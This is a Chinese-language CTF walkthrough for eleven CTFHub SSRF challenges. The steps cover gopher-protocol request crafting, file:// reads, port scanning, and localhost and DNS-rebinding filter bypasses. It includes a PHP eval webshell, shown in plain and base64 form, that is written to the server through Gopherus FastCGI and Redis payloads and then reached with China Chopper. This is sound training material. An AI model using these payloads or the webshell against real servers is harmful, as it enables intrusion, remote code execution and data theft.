1.内网访问
步骤一:打开题目,观看提示
步骤二:点开链接,网页url后面添加http://127.0.0.1/flag.php访问
步骤三:复制flag提交
2.伪协议读取文件
步骤一:打开题目,观看提示
步骤二:使用file协议,url后面输入file:///var/www/html/flag.php访问页面源代码
步骤三,复制flag提交
3.端口扫描
步骤一:打开题目,观看提示
步骤二:点开链接,url后面输入http://127.0.0.1:8000抓包
步骤三:抓到的包发放到Intruder,清楚payload位置,8000处添加payload
步骤四:payload修改数值,开始攻击
步骤五:查看数据长度不同的,查看它的响应包,最下方就是flag
步骤六:复制flag提交
4.POST请求
步骤一:打开题目,查看提示
步骤二:打开链接,url后面输入http://127.0.0.1/flag.php
步骤三:查看页面源代码,复制key
步骤四:返回上一页,把key添加在框内访问,抓包
步骤五:使用gopher协议构造post请求数据包,修改Host
步骤六:复制包内数据url编码
步骤七:将编码的内容复制到记事本中,将其中的 %0A 替换成 %0d%0A 并且末尾要加上 %0d%0a
步骤八:将内容再次url编码,粘贴到页面url后面访问
步骤九:复制flag提交
5.上传文件
步骤一:打开题目,查看提示
步骤二:打开链接,url后面输入http://127.0.0.1/flag.php
步骤三:Fn+F12打开控制台,源代码中写一个提交按钮
步骤四:上传一个php文件,提交查询抓包
步骤五:使用gopher协议构造post请求数据包,修改Host
步骤六:复制包内数据url编码,将编码的内容复制到记事本中,将其中的 %0A 替换成 %0d%0A 并且末尾要加上 %0d%0a
步骤七:将内容再次url编码,粘贴到页面url后面访问
步骤八:复制flag提交
6.FastCGI协议
步骤一:打开题目,查看提示
步骤二:kali虚拟机运行此命令 python2 gopherus.py --exploit fastcgi
步骤三:给定一个在服务器中存在的文件名
步骤四:给一句话木马base64编码,写入shell.php
echo "PD9waHAgQGV2YWwoJF9QT1NUW2NtZF0pOz8+" | base64 -d > cmd.php
步骤五:将生成的payload二次编码
步骤六:将二次编码的内容输入到网页url后面
步骤七:访问cmd.php,存在
步骤八:用中国菜刀添加数据连接
步骤九:访问根目录下的flag
步骤十:复制flag提交
7.Redis协议
步骤一:打开题目,查看提示
步骤二:kali虚拟机运行此命令 python2 gopherus.py --exploit redis
步骤三:选择PHPShell
步骤四:给定一个路径
步骤五:写一个一句话木马
<?php @eval($_POST[cmd]);?>
步骤六:复制payload二次编码
步骤七:将二次编码的内容输入到网页url后面
步骤八:访问shell.php
步骤九:用中国菜刀添加数据连接
步骤十:访问根目录下的flag
步骤十一:复制flag提交
8.URL Bypass
步骤一:打开题目,查看提示
步骤二:网页url后面输入http://notfound.ctfhub.com@127.0.0.1/flag.php
步骤三:复制flag提交
9.数字IP Bypass
步骤一:打开题目,查看提示
步骤二:网页url后面输入http://127.0.0.1/flag.php,发现127被ban
步骤三:127.0.0.1换成localhost
步骤四:复制flag提交
10.302跳转 Bypass
步骤一:打开题目,查看提示
步骤二: 网页url后面输入http://127.0.0.1/flag.php,发现IP被ban
步骤三:127.0.0.1换成localhost
步骤四:复制flag提交
11.DNS重绑定 Bypass
步骤一:打开题目,查看提示
步骤二:打开网站https://lock.cmpxchg8b.com/rebinder.html ,A处填127.0.0.1,B处填127.0.0.2
步骤三:复制7f000001.7f000002.rbndr.us,网页url后面输入http://7f000001.7f000002.rbndr.us/flag.php
步骤四:复制flag提交
